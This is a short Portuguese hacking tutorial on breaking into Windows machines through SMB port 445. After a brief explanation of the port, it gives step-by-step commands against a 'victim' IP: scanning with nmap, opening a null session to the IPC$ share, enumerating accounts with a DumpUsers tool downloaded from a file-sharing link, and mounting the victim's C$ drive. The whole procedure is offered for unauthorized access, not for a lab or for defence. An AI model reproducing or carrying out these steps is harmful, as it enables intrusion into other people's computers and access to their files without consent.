Invadindo Windows pela porta 445

*Neste tutorial vamos aprender a invadir o windows pela porta 445.

~> Mais sobre a porta 445 <~

*- A porta TCP 445 é do SMB (Server Message Block), que serve para compartilhamento de arquivos. A partir do Windows 2000, a Microsoft trocou as famosas TCP 139 e UDP 137-138, fazendo o SMB trafegar direto em cima do TCP/IP, pela 445. Ou seja, na sua rede interna, é um mal necessário. Já no firewall, na saída para Internet, deve ser fechada sempre, tanto inbound quanto outbound.

Como saber se a porta 445 está aberta
Muito simples digite netstat -an na cmd e aparecerá suas conexões ativas.

Programas utilizados

1.- DumpUsers
http://www.4shared.com/file/247061543/77ac7c72/DumpUsers.html
*Depois de baixar o dumpusers extraia ele para a pasta "Windows".

2.- Zenmap
http://nmap.org/dist/nmap-5.21-setup.exe
http://nmap.org/dist/nmap-5.21-win32.zip

Agora que você baixou o nmap, scaneie o IP da vítima e veja se a tal porta 445 está aberta.

*Como efetura a invasão

Vamos dizer que (000.000.000.000) é o IP da vítima, para saber se este IP é do Brasil basta que você olhe os números iniciais que são chamados ranges, que são utilizados para definir de onde é um certo indereço de IP.

1. Vá até a prompt de comando e didigte:
net use \\xxx.xxx.xxx.xxx\ipc$ "" /u:""

2. Abra outra CMD e digite:
dumpusers -target xxx.xxx.xxx.xxx -type notdc -start 1 -stop 900 -mode verbose

3. Abra o executar e digte:
iniciar>executar>\\xxx.xxx.xxx.xxx\c$

Pronto! Agora o disco local da vítima está compartilhado com você.